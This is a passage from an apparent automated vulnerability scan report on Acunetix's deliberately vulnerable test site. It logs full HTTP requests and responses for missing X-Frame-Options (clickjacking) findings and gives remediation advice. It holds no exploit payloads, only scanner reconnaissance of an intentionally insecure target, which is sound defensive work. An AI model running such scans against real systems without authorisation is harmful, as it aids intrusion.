              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+L5/dFSm3qL6WSrtXoxMhBWz78mQ==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        16. GET http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (315 bytes)
          GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 12954
          
          
          Response body (12954 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8wYbzXe+sXxDpSfVp4SwbIP85RvA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        17. POST http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/about.aspx
          Content-Length: 1027
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1027 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2F2grLtTL%2BjO092JULZB%2B%2Bks9UGJw%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
